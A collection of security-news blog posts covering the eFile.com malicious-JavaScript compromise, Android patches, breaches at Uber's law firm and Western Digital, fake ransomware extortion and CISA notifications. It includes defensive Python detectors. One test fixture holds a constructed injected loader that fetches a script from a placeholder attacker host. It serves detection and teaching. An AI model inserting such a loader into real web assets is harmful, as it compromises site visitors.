IT NEWS

Google aims to reduce data theft with app data and account deletions

Google has made several security improvements to how apps operate over the last 12 months or so: it is now a little easier to understand what an app wants from you, labels indicate a level of trustworthiness for developers, and old, abandoned apps no longer appear for download on the Play store.

Now the focus is on data collection, or to be more accurate, data deletion. Google wants people to be able to scrub data associated with an app. This counts for data inside of the application itself, but also out there on the web.

A farewell to app data?

Many apps require you to create an account, and very often those accounts are pinned to websites. This is particularly common with regard to video game apps, but can be a requirement for pretty much anything you choose to install depending on the developer’s needs.

From the Google announcement:

For apps that enable app account creation, developers will soon need to provide an option to initiate account and data deletion from within the app and online. This web requirement, which you will link in your Data safety form, is especially important so that a user can request account and data deletion without having to reinstall an app.

If you’re wondering, Google’s Data Safety Form is a way for developers to inform their users about how their data is used, collected, shared, and so on. All of the developer’s primary safety and privacy practices are listed here. Everything from what the developer itself does to how associated third-party entities work alongside them should be included.

Total account and data deletion

If an app user decides they no longer want anything to do with an application, there will be a way to ensure everything is gone for good. No more remnant accounts sitting around, potentially waiting to be compromised after a long period of abandonment.

From the release:

As the new policy states, when you fulfill a request to delete an account, you must also delete the data associated with that account. The feature also gives developers a way to provide more choice: users who may not want to delete their account entirely can choose to delete other data only where applicable (such as activity history, images, or videos). For developers that need to retain certain data for legitimate reasons such as security, fraud prevention, or regulatory compliance, you must clearly disclose those data retention practices.

As with so many changes of this nature, nothing is happening just yet. Developers have been given some time to get their houses in order if necessary, and submit their comments in relation to the proposed changes. They have from now until the beginning of December to do this. However, an extension is possible if needed which could give them until the end of May 2024. Either way, changes reflecting this new policy won’t kick in until somewhere around the beginning of next year.

As a device user there’s not much you can do about this for now. It’s squarely a heads up for developers to take a long look at the data they collect, and how to dispose of it when the app users feel that it’s no longer needed. Other major store owners are moving to similar policies, and this can only be a good thing for helping to reduce the threat of data theft.


Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Visitors of tax return e-file service may have downloaded malware

The IRS-authorized electronic filing service for tax returns, eFile.com, has been caught serving a couple of malicious JavaScript (JS) files these past few weeks, according to several security researchers and corroborated by BleepingComputer. Note this security incident only concerns eFile.com, not the IRS’ e-file infrastructure and other similar-sounding domains.

As of this writing, eFile.com is clean. Users can access it without worry.

The attack began 18 days ago

The first sign that something might be up with the website came from a Reddit user, who encountered a fake “Network Error” page when accessing www.efile.com. The page, shown below, informed visitors that their browser “uses an unsupported protocol” and that they needed to click the link it provided to update their browser, a well-known tactic often used by scammers.


This fake error message used to come up when visiting the domain. Uncharacteristically, it told visitors to update their browsers. This made Redditors suspect the domain was hijacked. (Source: /u/SaltyPotter, original image cropped to fit)

This, however, was not a standalone scam page: the site itself had been compromised.

Known figures in cybersecurity, such as MalwareHunterTeam (@malwarehunterteam) and Johannes Ullrich (@johullrich) of SANS, caught wind of the potential site compromise and dug in, with each writing their analysis.

According to both MalwareHunterTeam and Ullrich, a modified JS file named popper.js contained obfuscated malicious code that could not be read plainly. Its purpose was to load another script, update.js, hosted on Amazon Web Services (AWS). update.js contained the code that displayed the fake error page.

popper.js is a legitimate library file that was modified to perform malicious tasks. Because almost every page on the eFile.com website loads it, the malicious activity described above was triggered every time a user visited any page of the site.

update.js also contains two hard-coded download URLs, both served from the malicious domain infoamanewonliag[.]online. The two payloads target the two browsers visitors typically use, Chrome and Firefox.
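The tampering described here, a vendored library (popper.js) altered to pull a second-stage script from an attacker-controlled host, is exactly what a deploy-time integrity baseline catches. The following is an added example, not code from eFile.com, the researchers or Malwarebytes: it computes Subresource Integrity (SRI) digests for vendored scripts, compares them against a recorded baseline, and as a secondary heuristic scans each file for script loads from hosts outside an allowlist. The file contents, the baseline and the placeholder host (a .invalid domain standing in for the attacker's infrastructure) are all constructed for the example.

```python
"""Integrity audit for vendored front-end scripts (added example).

Two independent checks per asset: an SRI digest compared against a
baseline recorded at deploy time, and a scan for script loads from hosts
outside an allowlist. All file names, hosts and contents are constructed.
"""
import base64
import hashlib
import re
from urllib.parse import urlparse


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return an SRI integrity value ('sha384-<base64 digest>') for content.

    The same string can be placed in a <script integrity="..."> attribute so
    that browsers refuse a modified copy of the file.
    """
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


# Matches both static tags (<script src="...">) and dynamic loaders
# (el.src = "...") so an injected createElement('script') stub is caught.
_SCRIPT_SRC = re.compile(
    r"""(?:<script\b[^>]*?\bsrc\s*=\s*|\.src\s*=\s*)["']([^"']+)["']""", re.I
)


def external_script_urls(js: str, allowed_hosts: set) -> list:
    """Return script URLs whose host is not in allowed_hosts.

    Relative URLs (no host) are treated as first-party and skipped.
    """
    flagged = []
    for url in _SCRIPT_SRC.findall(js):
        host = urlparse(url).hostname
        if host and host.lower() not in allowed_hosts:
            flagged.append(url)
    return flagged


def audit_assets(assets: dict, baseline: dict, allowed_hosts: set) -> dict:
    """Compare deployed assets with the baseline; return {name: [problems]}.

    An empty dict means every asset matched its recorded digest and loads
    scripts only from allowed hosts.
    """
    findings = {}
    for name, content in assets.items():
        problems = []
        actual = sri_hash(content)
        expected = baseline.get(name)
        if expected is None:
            problems.append("asset not present in baseline")
        elif actual != expected:
            problems.append(f"hash mismatch: expected {expected}, got {actual}")
        text = content.decode("utf-8", errors="replace")
        for url in external_script_urls(text, allowed_hosts):
            problems.append(f"loads script from unexpected host: {url}")
        if problems:
            findings[name] = problems
    return findings


# --- Constructed sample data -------------------------------------------
# Stand-in for the pristine vendored library as recorded at deploy time.
CLEAN_POPPER = (
    b"/* popper.js (constructed stand-in for the vendored library) */\n"
    b"window.Popper = {createPopper: function () {}};\n"
)

# The same file with an injected second-stage loader appended. The host is
# a placeholder (.invalid TLD), not the infrastructure from the incident.
TAMPERED_POPPER = CLEAN_POPPER + (
    b"var s=document.createElement('script');"
    b"s.src='https://static.attacker-bucket.invalid/update.js';"
    b"document.head.appendChild(s);\n"
)

ALLOWED_HOSTS = {"www.efile.com", "efile.com"}
BASELINE = {"popper.js": sri_hash(CLEAN_POPPER)}


if __name__ == "__main__":
    for label, content in (("clean", CLEAN_POPPER), ("tampered", TAMPERED_POPPER)):
        result = audit_assets({"popper.js": content}, BASELINE, ALLOWED_HOSTS)
        print(label, "->", result or "OK")
```

The hash comparison is the primary signal: an obfuscated loader, as in this incident, may slip past the URL regex but cannot change the file without changing its digest. Publishing the same `integrity` value in the `<script>` tag lets browsers refuse a tampered copy outright, which works for files that are not meant to change in place.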

“So different browsers get different payloads,” says Ullrich. Chrome users get a payload named “update.exe” with a valid signature from Sichuan Niurui Science and Technology. Firefox users get “installer.exe.” There is no indication whether other browsers built on Chromium (the codebase Chrome is based on) or on Firefox’s Quantum engine would also receive the payloads.

BleepingComputer has independently confirmed the payloads connect to an IP address hosted by Alibaba in China. The same IP also hosts the illicit domain the payloads were downloaded from.

These executables were written in Python. Malwarebytes detects them as Trojan.Downloader.Python.

As of Wednesday, popper.js is free of malicious code.

The backdoor

Once a user runs the payload, a PHP-based backdoor script runs quietly in the background. BleepingComputer’s analysis shows that every 10 seconds the script connects to a remote command and control (C2) server to receive one or more tasks to perform on the affected system. These include “executing a command and sending its output back to the attackers or downloading additional files onto the computer.”

The backdoor is unsophisticated, but it is enough to give the attackers full access to the infected system, including company-owned devices.
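A fixed 10-second poll is a strong network signal in its own right. As an added example (not BleepingComputer’s analysis code), the Python below groups outbound connection records by source and destination, measures the gaps between successive connections and flags pairs whose cadence is both frequent and low-jitter. The log format, addresses and timestamps are constructed; the real backdoor’s C2 address and protocol are not reproduced.

```python
"""Beacon detection over outbound connection logs (added example).

Groups connection records by (src, dst), measures the gaps between
successive connections and flags pairs whose gaps are frequent and
low-jitter, the signature of a polling loop with a fixed sleep.
The log format and every address below are constructed.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev


def parse_line(line: str) -> tuple:
    """Parse '<YYYY-MM-DD HH:MM:SS> key=value ...' into (timestamp, src, dst)."""
    date, time, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return datetime.fromisoformat(f"{date} {time}"), kv["src"], kv["dst"]


def beacon_candidates(lines, min_hits: int = 6, max_jitter: float = 0.2) -> list:
    """Return (src, dst) pairs whose connection cadence looks like a beacon.

    max_jitter is the coefficient of variation (stdev / mean) of the gaps
    between connections: a fixed-sleep poll stays well under 0.2, human
    browsing almost never does. min_hits avoids judging on too few samples.
    """
    by_pair = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ts, src, dst = parse_line(line)
        by_pair[(src, dst)].append(ts)

    hits = []
    for (src, dst), times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            hits.append({
                "src": src,
                "dst": dst,
                "connections": len(times),
                "period_s": round(median(gaps), 1),
                "jitter": round(jitter, 3),
            })
    return hits


# Constructed proxy log: 10.0.0.5 polls one host every ~10 s (the backdoor
# pattern); 10.0.0.9 browses another host at irregular intervals.
LOG_LINES = """
2023-04-05 10:00:00 src=10.0.0.5 dst=203.0.113.10:80 bytes=412
2023-04-05 10:00:00 src=10.0.0.9 dst=198.51.100.7:443 bytes=15320
2023-04-05 10:00:03 src=10.0.0.9 dst=198.51.100.7:443 bytes=8801
2023-04-05 10:00:10 src=10.0.0.5 dst=203.0.113.10:80 bytes=412
2023-04-05 10:00:20 src=10.0.0.5 dst=203.0.113.10:80 bytes=430
2023-04-05 10:00:31 src=10.0.0.5 dst=203.0.113.10:80 bytes=412
2023-04-05 10:00:40 src=10.0.0.5 dst=203.0.113.10:80 bytes=412
2023-04-05 10:00:50 src=10.0.0.5 dst=203.0.113.10:80 bytes=412
2023-04-05 10:01:00 src=10.0.0.5 dst=203.0.113.10:80 bytes=412
2023-04-05 10:01:15 src=10.0.0.9 dst=198.51.100.7:443 bytes=2210
2023-04-05 10:01:16 src=10.0.0.9 dst=198.51.100.7:443 bytes=77
2023-04-05 10:04:40 src=10.0.0.9 dst=198.51.100.7:443 bytes=9912
2023-04-05 10:05:02 src=10.0.0.9 dst=198.51.100.7:443 bytes=1201
2023-04-05 10:12:30 src=10.0.0.9 dst=198.51.100.7:443 bytes=5600
""".strip().splitlines()


if __name__ == "__main__":
    for hit in beacon_candidates(LOG_LINES):
        print(hit)
```

Real malware often adds random sleep precisely to defeat this check, so the jitter threshold is a tunable rather than a constant. The connection-count threshold and the period itself (seconds rather than hours) help separate a backdoor poll from legitimate heartbeats such as update checks, which should be allowlisted by destination rather than by cadence.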

“The full scope of this incident, including if the attack successfully infected any eFile.com visitors and customers, remains yet to be learned,” says BleepingComputer.



Uber data theft: Driver info stolen after law firm breached

Uber has once again become a victim of data theft following a third-party breach. This time, the threat actors targeted the company’s law firm, Genova Burns, and data on Uber’s drivers may have been taken during the incident.

According to the letter sent to affected drivers, the firm became aware of “suspicious activity relating to our internal information systems” on January 31, 2023, and immediately engaged outside experts to investigate. Data was exfiltrated between January 23 and January 31. The firm contacted Uber after discovering that driver data was affected.

The Register, who first reported the incident, shares the below statement from an Uber spokesperson regarding the attack against Genova Burns:

Impacted information held by Genova Burns included information of certain drivers who had completed trips in New Jersey, including social security number and/or tax identification number. These drivers have been notified that their social security number and/or tax identification number have been potentially impacted and offered complimentary credit monitoring and identity protection services.

Genova Burns indicates that they are not aware of any actual or attempted misuse of the information, and confirmed that they are taking additional steps to improve security and better protect against similar incidents in the future.

The firm also promises to take “additional steps to improve security and better help protect against similar incidents in the future.” It didn’t elaborate on those steps, however.

No Uber customer data was touched in the attack. As is usual in such cases, affected drivers get one year of free identity monitoring services, according to The Register.

Uber is no stranger to third-party breaches. In December, threat actors stole data from Teqtivity, a vendor that provides asset management and tracking services for the company; data on 77,000 Uber employees was later leaked.



9 vital criteria for effective endpoint security: Insights from the ‘Endpoint Security Evaluation Guide’ eBook

Endpoint security has never been more important, and with the increasing complexity of the security stack, choosing the right solution can be confusing. The good news is that there is a guide available to help organizations navigate this complex landscape: the “Endpoint Security Evaluation Guide” eBook.

One of the biggest challenges in selecting an endpoint security solution is ensuring that it can protect against both existing and emerging threats, without negatively impacting system performance or causing too many false positives. This is where MRG Effitas’ independent lab assessment comes in.

Evaluating endpoint security today

MRG Effitas’ 360° Assessment & Certification evaluates endpoint security vendors against nine vital criteria for efficacy, performance, and reliability. These include blocking potentially unwanted applications, preventing exploit and post-exploitation techniques, and blocking in-house ransomware samples. Based on a product’s performance on these criteria, MRG Effitas awards four certifications: 360° Level 1, 360° Exploit, 360° Online Banking, and 360° Ransomware.

Malwarebytes is a well-known name in the endpoint security industry, and it’s no surprise that they were put to the test in MRG Effitas’ 360° Assessment & Certification. The “Endpoint Security Evaluation Guide” eBook features Malwarebytes’ results on the assessment and includes head-to-head matchups of Malwarebytes versus each participating vendor. One shining takeaway is that Malwarebytes was the only vendor to win every certification in 2022. 

Read our recap blog for the full results: https://www.malwarebytes.com/blog/business/2023/03/malwarebytes-only-vendor-to-win-every-mrg-effitas-certification-award-in-2022 


In today’s complex threat landscape, it is more important than ever to choose an endpoint security solution that can effectively protect against a wide range of threats, while minimizing false positives and system impact. The “Endpoint Security Evaluation Guide” eBook, based on MRG Effitas’ independent lab assessment, is an essential tool for any organization looking to make an informed decision about endpoint security. Download below!

GET THE ENDPOINT SECURITY EVALUATION GUIDE

Update Android now! Google patches three important vulnerabilities

In the April 2023 Android security bulletin, Google announced security updates that include fixes for two critical remote code execution (RCE) vulnerabilities and one vulnerability that has been exploited in the wild. The vulnerabilities affect Android versions 11, 12, 12L, and 13. Users should update as soon as they can.

What needs to be done

If your Android device is on security patch level 2023-04-05 or later, all of these issues are addressed. Android partners are notified of all issues at least a month before publication, but that does not always mean patches are available for devices from every vendor on the day the bulletin appears.

You can find your Android’s version number, security update level, and Google Play system level in your Settings app. You should get notifications when updates are available for you, but you can also check for updates.

For most phones it works like this: Under About phone or About device you can tap on Software updates to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device.

Two critical vulnerabilities

Google rarely discloses many details about these vulnerabilities; access to bug details and links is usually restricted until the majority of users have received the fix. Here’s what we know so far:

CVE-2023-21085: A vulnerability in the System component that allows a remote attacker to execute arbitrary code. It exists due to improper input validation within the System component; a remote attacker can trick the victim into opening a specially crafted file and execute arbitrary code.

When a program is unable to perform a proper verification of input, using unintended input can influence program data flow handling. Attackers can abuse this by creating input data that can cause changes of control flow, arbitrary control of a resource, or arbitrary code execution.

CVE-2023-21096: Another vulnerability in the System component that allows a remote attacker to execute arbitrary code. It too exists due to improper input validation within the System component; a remote attacker can trick the victim into opening a specially crafted file and execute arbitrary code.

One vulnerability exploited in the wild

CVE-2022-38181: A vulnerability in the Arm Mali GPU kernel driver allows unprivileged users to access freed memory because GPU memory operations are mishandled. This use-after-free (UAF) vulnerability allows a local application to escalate privileges on the system. A local application can trigger memory corruption and execute arbitrary code with elevated privileges. This vulnerability is known to be exploited in targeted attacks and was first spotted in November 2022.

UAF is a type of vulnerability that results from incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the dangling pointer to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code. By abusing dynamic memory belonging to a program with higher privileges, the attacker can run their own code with those privileges.


We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Fake ransomware demands payment without actually encrypting files

Fake it till you make it ransomware groups are trying to get rich off the backs of genuine ransomware authors. Why are they “fake it till you make it”? Because they don’t actually create ransomware or compromise networks in any way. They’re simply lying through their teeth and hoping that recipients of their messages don’t realise until it’s too late.

As reported by Bleeping Computer, a group named Midnight has been using this tactic since at least March 16, and the organisations affected all seem to be located in the US. 

The battle plan of a fake ransomware group

The general approach is as follows:

  • Claim to be a different, genuine ransomware group. If the scammers claim to be some sort of obscure (but known) affiliate or spin-off, so much the better. The target will confirm the group exists with a quick Google search, but won’t be able to do much more beyond that.
  • Use a panic-inducing email subject. “Notifying you about your business’s security case, we accessed your information” is one example given.
  • The bigger the theft claim, the better. They talk of accessing HR records, employee records, personal and medical data. In one “attack” 600GB of data was supposedly taken from business servers.
  • Targeting genuine victims by accident or design. Some businesses targeted by the fakers had indeed suffered a ransomware attack of some kind previously. Either the scare tactic mails are being blasted out to a large audience to see what comes back, or there is some deliberate targeting of organisations going on.

Nothing new, but potentially disastrous all the same

Fake mails are nothing new; 18 years of one 419 mail is as good an example as any. Send enough emails out and someone will fall for it eventually. The bogus ransomware extortion attempt even has a name: the “Phantom Incident Scam”.

Even so, this is an area where a good response strategy for exactly this kind of technology-based lie is very effective. If your incident response consists of opening one of these messages, panicking, and racing to pay the fraudsters, it could end up being a very costly and needless mistake. Whether or not your organisation has had a genuine breach, having a named point of contact on the org chart for exactly this eventuality will come in very handy.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.



Western Digital confirms breach, affects My Cloud and SanDisk users

Western Digital, a big brand in digital storage, says it has suffered a “network security incident—potentially ransomware—which resulted in a breach and some system disruptions in its business operations.”

The company identified the incident on March 26 and said an unnamed third party unlawfully accessed several computer systems to steal data. The investigation is ongoing and Western Digital has yet to learn how much was taken. 

Since the incident, Western Digital’s consumer cloud and backup service My Cloud has experienced outages, preventing customers from accessing their files. My Cloud Home, My Cloud Home Duo, My Cloud OS5, SanDisk ibi, and SanDisk Ixpand Wireless Charger all experienced service interruptions. 

Western Digital said in its press release:

“The Company is implementing proactive measures to secure its business operations including taking systems and services offline and will continue taking additional steps as appropriate. As part of its remediation efforts, Western Digital is actively working to restore impacted infrastructure and services. Based on the investigation to date, the Company believes the unauthorized party obtained certain data from its systems and is working to understand the nature and scope of that data.”

Western Digital is a billion-dollar company, making it an attractive target for criminals aiming to cash in; it reported revenue of $3.1B in the first quarter of 2023 alone.

We’ll update this story as we learn more.



TikTok misused children’s data, faces $15.6M fine

TikTok has been ordered to pay a fine of $15.6M (£12.7M) for failing to protect 1.4 million UK children under the age of 13 from accessing its platform in 2020. The Information Commissioner’s Office (ICO), the UK’s data protection watchdog, imposed the fine after finding the company used children’s data without parental consent.

According to the ICO, the company may have used the data for tracking and profiling purposes. It may have also presented children with content deemed potentially harmful or inappropriate.

“There are laws in place to make sure our children are as safe in the digital world as they are in the physical world. TikTok did not abide by those laws,” said John Edwards, information commissioner for the ICO.

“TikTok should have known better. TikTok should have done better.”

Edwards told BBC News that TikTok had “taken no steps” to get parents’ consent.

“If you’ve been looking at content which is not appropriate for your age, that can get more and more extreme. It can be quite harmful for people who are not old enough to fully appreciate the implications and to make appropriate choices.”

In an interview with the BBC, Prof Sonia Livingstone, a researcher who studies children’s digital rights and experiences at the London School of Economics and Political Science, said she was happy the ICO had taken action against TikTok but fears the fine could be “shrugged off as the cost of doing business,” implying that nothing much might change with how TikTok operates.

“Let’s hope TikTok reviews its practices thoroughly and makes sure that it respects children’s privacy and safety proactively in the future,” she said.

A TikTok spokesperson said the company invests “heavily to help keep under 13s off the platform and our 40,000-strong safety team works around the clock to help keep the platform safe for our community.”

“We will continue to review the decision and are considering next steps,” the spokesperson added.

The ICO gave TikTok 28 days to appeal the fine.



2023 State of Malware Report: What the channel needs to know to stay ahead of threats

The channel, comprising managed service providers (MSPs), Systems Integrators (SIs), value-added resellers (VARs), and more, plays a vital role in providing cybersecurity for companies around the globe today. But as malware evolves and cyberattacks become more common, keeping up with the top threats to the channel can be difficult.

With a plethora of cyberthreats out there, which ones should channel partners focus on in 2023?

Malwarebytes addresses this question in the 2023 State of Malware Report, identifying the five most potentially damaging malware threats that MSPs, SIs, VARs, and their clients should prioritize.

Key channel threats in the 2023 State of Malware Report

One example of threats the channel should prepare for is the email-borne Emotet Trojan, a notorious threat that continues to plague businesses. The report also highlights the growing issue of ransomware attacks, 39% of which target service providers according to Kaseya’s 2022 MSP Benchmark Survey.

A particular focus is on the ransomware group LockBit, which carried out more attacks than any other ransomware group in 2022. In February 2023 alone, the group published 126 victims on its leak page. LockBit affects organizations of all sizes, from hospitals to small and large businesses.

Our report serves as a valuable resource for channel partners, helping them optimize defense strategies and take both proactive and reactive measures in the fight against the most damaging malware threats of the year. By using the insights from the report, the channel can better protect their own organizations as well as their customers’.

The role of channel partners in cybersecurity

The channel is pivotal to helping their clients adapt to the ever-changing threat landscape and avoid falling victim to devastating cyberattacks. As channel partners make their way into 2023, they can stay ahead of the curve by keeping these tips in mind:

  • Prioritize the top five malware threats identified in the Malwarebytes report and implement targeted defense strategies to protect clients against these risks.
  • Read our Threat Intelligence blog to keep informed about the latest cyberthreats, such as the activities of ransomware groups like LockBit, to ensure your clients are prepared for emerging risks.
  • Educate your clients about the evolving threat landscape and help them develop a culture of security awareness within their organizations.
  • Continuously evaluate and optimize your security offerings to ensure they meet the needs of your clients and protect against the latest threats.

Channel partners are uniquely positioned to guide companies through the complex cybersecurity landscape. As trusted advisors, they play a crucial role in educating businesses about the latest threats, providing tailored security solutions, and ensuring that their clients—and themselves—can continue to operate securely and efficiently. Read the full report below to learn more.

Get the full 2023 State of Malware report for the channel

Pre-ransomware notifications are paying off right off the bat

CISA (Cybersecurity and Infrastructure Security Agency) has published the first results of its pre-ransomware notifications that were introduced at the start of 2023.

Even though this initiative is relatively young, CISA says it “has notified over 60 entities across the energy, healthcare, water/wastewater, education, and other sectors about potential pre-ransomware intrusions, and we’ve confirmed that many of them identified and remediated the intrusion before encryption or data loss occurred.”

The notifications are delivered through the Joint Cyber Defense Collaborative (JCDC), which CISA established to “unify cyber defenders from organizations worldwide”. The team proactively gathers, analyzes, and shares actionable cyber risk information.

The success of the operation relies on a few key factors:

  • Sharing intelligence by the cybersecurity research community, infrastructure providers, and cyber threat intelligence companies about potential early-stage ransomware activity.
  • Getting that information to the victim organization and providing specific guidance about containing the threat.
  • The time it takes cybercriminals to go from the initial breach to the full-fledged ransomware attack; that window is what gives defenders the chance to act.

Basically, the more information organizations share about early-stage ransomware activity, the better the information the JCDC can provide. This information also helps keep lists like the Known Exploited Vulnerabilities (KEV) catalog up to date, and feeds the ransomware vulnerability warnings that inform organizations when a vulnerability used by ransomware threat actors is present on their network.

But how do pre-ransomware notifications work in real life?

Let’s take the fake IRS mail we reported about last week as an example. My colleagues found an email being sent out with the title of “IRS Tax Forms W-9” which appears to have been sent from “IRS Online Center”. In reality, the attachment contains a malicious macro. Enabling the content of the attachment will result in Emotet being downloaded onto the system.

The JCDC can in turn share this information with potential victims: “Have you seen this mail? Did anyone open the attachment? Did they use the ‘Enable Content’ button? Here is what you can do to prevent your systems from getting encrypted. These are the tactics, techniques, and procedures (TTPs) and Indicators of Compromise (IOCs) you need to look for.” And the call to action can be very specific, because they know that any potential victim should be looking for Emotet.
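The “Did anyone open the attachment? Did they use Enable Content?” questions come down to whether a macro-enabled document reached a user. As an added example (not CISA’s or Malwarebytes’ tooling), the Python below inspects an Office attachment’s container rather than its extension: modern Office files are zip archives in which a VBA project is stored as a vbaProject.bin part and declared in [Content_Types].xml, so a .docm renamed to .docx is still caught. The sample documents are constructed in memory; no real Emotet lure is embedded.

```python
"""Flag macro-enabled Office attachments (added example).

Modern Office files (.docx/.docm/.xlsx/.xlsm) are zip containers; a VBA
project lives in a vbaProject.bin part and is declared in
[Content_Types].xml. Legacy .doc/.xls files are OLE compound files whose
macro streams need an OLE parser, so they are reported separately.
The sample documents below are constructed in memory.
"""
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"


def inspect_office_attachment(data: bytes) -> dict:
    """Return {'format': ..., 'macros': True/False/None, 'evidence': [...]}.

    macros is None for legacy OLE files: the container alone cannot tell,
    so route those to an OLE-aware scanner.
    """
    if data.startswith(OLE_MAGIC):
        return {"format": "ole", "macros": None, "evidence": ["legacy OLE container"]}
    if not data.startswith(b"PK\x03\x04"):
        return {"format": "other", "macros": False, "evidence": []}

    evidence = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        for name in names:
            lower = name.lower()
            if lower.endswith("vbaproject.bin"):
                evidence.append(f"part present: {name}")
            elif "macrosheets/" in lower:
                # Excel 4.0 (XLM) macro sheets run without any VBA project.
                evidence.append(f"Excel 4.0 macro sheet: {name}")
        if "[Content_Types].xml" in names:
            ct = z.read("[Content_Types].xml").decode("utf-8", errors="replace")
            if VBA_CONTENT_TYPE in ct:
                evidence.append("content type declares a VBA project")
            if "macroEnabled" in ct:
                evidence.append("main part is a macro-enabled document type")
    return {"format": "ooxml", "macros": bool(evidence), "evidence": evidence}


def build_sample_document(with_macro: bool) -> bytes:
    """Build a minimal constructed .docx/.docm-shaped zip for testing."""
    main_type = (
        "application/vnd.ms-word.document.macroEnabled.main+xml"
        if with_macro
        else "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
    )
    overrides = f'<Override PartName="/word/document.xml" ContentType="{main_type}"/>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        if with_macro:
            overrides += f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>'
            # Placeholder bytes only; a real vbaProject.bin is an OLE container.
            z.writestr("word/vbaProject.bin", OLE_MAGIC + b"\x00" * 16)
        z.writestr(
            "[Content_Types].xml",
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            + overrides + "</Types>",
        )
        z.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("plain", build_sample_document(False)),
                       ("macro", build_sample_document(True))):
        print(label, inspect_office_attachment(doc))
```

Legacy binary .doc/.xls attachments come back as “cannot tell” here; hand those to an OLE-aware scanner such as oletools’ olevba. Because the check reads the container rather than trusting the extension or the declared content type alone, a renamed file or a stripped [Content_Types].xml still produces evidence.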

For many non-profit organizations that can’t afford their own security team or an external Managed Detection and Response (MDR) service, this is very helpful and, as CISA concludes, has proven its usefulness. While the pre-ransomware notification service is aimed at US organizations, the JCDC works with international Computer Emergency Response Team (CERT) partners to enable timely notification when a company outside the US is concerned.

The more information we share, the better the information JCDC can provide gets. Any organization or individual with information about early-stage ransomware activity is urged to contact Report@cisa.dhs.gov. If your organization is interested in participating in these collaborative efforts to stop ransomware, please visit cisa.gov/JCDC-faqs or email cisa.jcdc@cisa.dhs.gov.

Every US ransomware incident should be reported to the US government. You can find information on reporting at stopransomware.gov.
